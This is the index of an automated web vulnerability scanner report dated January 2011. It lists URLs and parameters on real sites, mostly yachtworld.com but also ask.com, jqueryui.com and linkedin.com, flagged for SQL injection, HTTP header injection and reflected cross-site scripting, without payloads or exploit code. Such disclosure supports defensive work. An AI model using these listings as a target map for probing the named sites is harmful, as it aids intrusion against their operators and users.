Cross Site Scripting, SQL Injection, HTTP Header Injection, Report for January 27, 2011

XSS, SQLi, HTTPi, CWE-79, CWE-89, CWE-113 | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 19:20:18 CST 2011.


1. SQL injection

1.1. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s41495727926958 [REST URL parameter 5]

1.2. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s42079387209378 [REST URL parameter 3]

1.3. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43482092181220 [REST URL parameter 1]

1.4. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43772089285776 [REST URL parameter 1]

1.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 1]

1.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 4]

1.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [VIEWED_BOATS_STORE cookie]

1.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [primary_photo_id parameter]

2. HTTP header injection

2.1. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]

2.2. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]

2.3. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

2.4. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

2.5. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

2.6. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]

2.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [currency parameter]

2.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

2.9. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]

2.10. https://www.yachtworld.com/ [savedLabel0 cookie]

2.11. https://www.yachtworld.com/ [savedLabel1 cookie]

2.12. http://wzus1.ask.com/i/i.gif [REST URL parameter 1]

2.13. http://wzus1.ask.com/i/i.gif [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.2. http://ads.pointroll.com/PortalServe/ [r parameter]

3.3. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.4. http://ads.pointroll.com/PortalServe/ [time parameter]

3.5. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]

3.6. http://govguru.com/north-carolina/boat-registration [REST URL parameter 1]

3.7. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]

3.8. http://govguru.com/north-carolina/boat-registration [REST URL parameter 2]

3.9. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]

3.10. http://govguru.com/north-carolina/boat-registration [name of an arbitrarily supplied request parameter]

3.11. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]

3.12. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.13. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.14. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.15. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.16. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.17. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.18. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.19. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.20. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.21. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.30. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.31. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.32. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.33. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.34. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.35. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.36. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.37. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.38. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.39. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.40. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.41. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.42. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.43. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.44. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.45. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.46. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.47. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.48. http://jqueryui.com/themeroller/ [fcActive parameter]

3.49. http://jqueryui.com/themeroller/ [fcContent parameter]

3.50. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.51. http://jqueryui.com/themeroller/ [fcError parameter]

3.52. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.53. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.54. http://jqueryui.com/themeroller/ [fcHover parameter]

3.55. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.56. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.57. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.58. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.59. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.60. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.61. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.62. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.63. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.64. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.65. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.66. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.67. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.68. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.69. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.70. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.71. http://ss.ask.com/query [fn parameter]

3.72. http://ss.ask.com/query [q parameter]

3.73. http://www.ask.com/ans [l parameter]

3.74. http://www.ask.com/pictures [l parameter]

3.75. http://www.ask.com/pictures [q parameter]

3.76. http://www.ask.com/pictureslanding [l parameter]

3.77. http://www.ask.com/web [q parameter]

3.78. http://www.ask.com/web [qid parameter]

3.79. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]

3.80. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]

3.81. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 3]

3.82. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 4]

3.83. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 5]

3.84. https://www.linkedin.com/secure/login [REST URL parameter 1]

3.85. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

3.86. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

3.87. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

3.88. http://www.yachtworld.com/bluewater/email.cgi [office_id parameter]

3.89. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 4]

3.90. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 5]

3.91. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 6]

3.92. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [name of an arbitrarily supplied request parameter]

3.93. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 4]

3.94. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 5]

3.95. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 6]

3.96. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [name of an arbitrarily supplied request parameter]

3.97. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 4]

3.98. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 5]

3.99. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 6]

3.100. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [name of an arbitrarily supplied request parameter]

3.101. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 4]

3.102. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]

3.103. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]

3.104. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [name of an arbitrarily supplied request parameter]

3.105. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 4]

3.106. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 5]

3.107. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 6]

3.108. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [name of an arbitrarily supplied request parameter]

3.109. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 4]

3.110. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 5]

3.111. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 6]

3.112. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [name of an arbitrarily supplied request parameter]

3.113. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 4]

3.114. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 5]

3.115. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [REST URL parameter 6]

3.116. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States [name of an arbitrarily supplied request parameter]

3.117. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 4]

3.118. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 5]

3.119. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [REST URL parameter 6]

3.120. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States [name of an arbitrarily supplied request parameter]

3.121. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 4]

3.122. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 5]

3.123. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 6]

3.124. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [name of an arbitrarily supplied request parameter]

3.125. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 4]

3.126. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 5]

3.127. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [REST URL parameter 6]

3.128. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States [name of an arbitrarily supplied request parameter]

3.129. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 4]

3.130. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 5]

3.131. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [REST URL parameter 6]

3.132. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]

3.133. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]

3.134. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 4]

3.135. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 5]

3.136. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [REST URL parameter 6]

3.137. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States [name of an arbitrarily supplied request parameter]

3.138. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 4]

3.139. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 5]

3.140. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 6]

3.141. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [name of an arbitrarily supplied request parameter]

3.142. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 4]

3.143. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 5]

3.144. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 6]

3.145. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [name of an arbitrarily supplied request parameter]

3.146. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 4]

3.147. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 5]

3.148. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [REST URL parameter 6]

3.149. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States [name of an arbitrarily supplied request parameter]

3.150. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 4]

3.151. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 5]

3.152. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [REST URL parameter 6]

3.153. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States [name of an arbitrarily supplied request parameter]

3.154. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 4]

3.155. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [REST URL parameter 5]

3.156. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States [name of an arbitrarily supplied request parameter]

3.157. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 4]

3.158. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 5]

3.159. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 6]

3.160. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [name of an arbitrarily supplied request parameter]

3.161. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 4]

3.162. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 5]

3.163. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [REST URL parameter 6]

3.164. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States [name of an arbitrarily supplied request parameter]

3.165. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 4]

3.166. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 5]

3.167. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [REST URL parameter 6]

3.168. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States [name of an arbitrarily supplied request parameter]

3.169. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [REST URL parameter 4]

3.170. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [REST URL parameter 5]

3.171. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy [name of an arbitrarily supplied request parameter]

3.172. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 4]

3.173. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 5]

3.174. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [REST URL parameter 6]

3.175. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [name of an arbitrarily supplied request parameter]

3.176. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2]

3.177. http://www.yachtworld.com/boats/Power/Bowrider/1 [REST URL parameter 4]

3.178. http://www.yachtworld.com/boats/Power/Bowrider/1 [REST URL parameter 4]

3.179. http://www.yachtworld.com/boats/Power/Center+Console/1 [REST URL parameter 4]

3.180. http://www.yachtworld.com/boats/Power/Convertible+Boat/1 [REST URL parameter 4]

3.181. http://www.yachtworld.com/boats/Power/Cruiser/1 [REST URL parameter 4]

3.182. http://www.yachtworld.com/boats/Power/Cuddy+Cabin/1 [REST URL parameter 4]

3.183. http://www.yachtworld.com/boats/Power/Express+Cruiser/1 [REST URL parameter 4]

3.184. http://www.yachtworld.com/boats/Power/Flybridge/1 [REST URL parameter 4]

3.185. http://www.yachtworld.com/boats/Power/Motor+Yacht/1 [REST URL parameter 4]

3.186. http://www.yachtworld.com/boats/Power/Other/1 [REST URL parameter 4]

3.187. http://www.yachtworld.com/boats/Power/Saltwater+Fishing/1 [REST URL parameter 4]

3.188. http://www.yachtworld.com/boats/Power/Sport+Fishing/1 [REST URL parameter 4]

3.189. http://www.yachtworld.com/boats/Power/Trawler/1 [REST URL parameter 4]

3.190. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]

3.191. http://www.yachtworld.com/boats/Sail/Cruiser/1 [REST URL parameter 4]

3.192. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 3]

3.193. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 4]

3.194. http://www.yachtworld.com/boats/category/type/Albin/1 [REST URL parameter 5]

3.195. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 3]

3.196. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 4]

3.197. http://www.yachtworld.com/boats/category/type/Bayliner/1 [REST URL parameter 5]

3.198. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 3]

3.199. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 4]

3.200. http://www.yachtworld.com/boats/category/type/Beneteau/1 [REST URL parameter 5]

3.201. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 3]

3.202. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 4]

3.203. http://www.yachtworld.com/boats/category/type/Bertram/1 [REST URL parameter 5]

3.204. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 3]

3.205. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 4]

3.206. http://www.yachtworld.com/boats/category/type/Boston+Whaler/1 [REST URL parameter 5]

3.207. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 3]

3.208. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 4]

3.209. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 5]

3.210. http://www.yachtworld.com/boats/category/type/Cape+Dory/1 [REST URL parameter 3]

3.211. http://www.yachtworld.com/boats/category/type/Cape+Dory/1 [REST URL parameter 4]

3.212. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 3]

3.213. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 4]

3.214. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 5]

3.215. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 3]

3.216. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 4]

3.217. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 5]

3.218. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 3]

3.219. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 4]

3.220. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 5]

3.221. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 3]

3.222. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 4]

3.223. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 5]

3.224. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 3]

3.225. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 4]

3.226. http://www.yachtworld.com/boats/category/type/Chris-craft/1 [REST URL parameter 5]

3.227. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 3]

3.228. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 4]

3.229. http://www.yachtworld.com/boats/category/type/Cruisers/1 [REST URL parameter 5]

3.230. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 3]

3.231. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 4]

3.232. http://www.yachtworld.com/boats/category/type/Formula/1 [REST URL parameter 5]

3.233. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 3]

3.234. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 4]

3.235. http://www.yachtworld.com/boats/category/type/Four+Winns/1 [REST URL parameter 5]

3.236. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 3]

3.237. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 4]

3.238. http://www.yachtworld.com/boats/category/type/Grady+White/1 [REST URL parameter 5]

3.239. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 3]

3.240. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 4]

3.241. http://www.yachtworld.com/boats/category/type/Grand+Banks/1 [REST URL parameter 5]

3.242. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 3]

3.243. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 4]

3.244. http://www.yachtworld.com/boats/category/type/Hatteras/1 [REST URL parameter 5]

3.245. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 3]

3.246. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 4]

3.247. http://www.yachtworld.com/boats/category/type/Hinckley/1 [REST URL parameter 5]

3.248. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 3]

3.249. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 4]

3.250. http://www.yachtworld.com/boats/category/type/Hunter/1 [REST URL parameter 5]

3.251. http://www.yachtworld.com/boats/category/type/Island+Packett/1 [REST URL parameter 3]

3.252. http://www.yachtworld.com/boats/category/type/Island+Packett/1 [REST URL parameter 4]

3.253. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 3]

3.254. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 4]

3.255. http://www.yachtworld.com/boats/category/type/Luhrs/1 [REST URL parameter 5]

3.256. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 3]

3.257. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 4]

3.258. http://www.yachtworld.com/boats/category/type/Mainship/1 [REST URL parameter 5]

3.259. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 3]

3.260. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 4]

3.261. http://www.yachtworld.com/boats/category/type/Maxum/1 [REST URL parameter 5]

3.262. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 3]

3.263. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 4]

3.264. http://www.yachtworld.com/boats/category/type/Pursuit/1 [REST URL parameter 5]

3.265. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 3]

3.266. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 4]

3.267. http://www.yachtworld.com/boats/category/type/Regal/1 [REST URL parameter 5]

3.268. http://www.yachtworld.com/boats/category/type/Regulator [REST URL parameter 3]

3.269. http://www.yachtworld.com/boats/category/type/Regulator [REST URL parameter 4]

3.270. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 3]

3.271. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 4]

3.272. http://www.yachtworld.com/boats/category/type/Rinker/1 [REST URL parameter 5]

3.273. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 3]

3.274. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 4]

3.275. http://www.yachtworld.com/boats/category/type/Sabre/1 [REST URL parameter 5]

3.276. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 3]

3.277. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 4]

3.278. http://www.yachtworld.com/boats/category/type/Sea+Ray/1 [REST URL parameter 5]

3.279. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 3]

3.280. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 4]

3.281. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 5]

3.282. http://www.yachtworld.com/boats/category/type/Tartan/1 [REST URL parameter 3]

3.283. http://www.yachtworld.com/boats/category/type/Tartan/1 [REST URL parameter 4]

3.284. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 3]

3.285. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 4]

3.286. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 5]

3.287. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 3]

3.288. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 4]

3.289. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 5]

3.290. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 3]

3.291. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 4]

3.292. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 5]

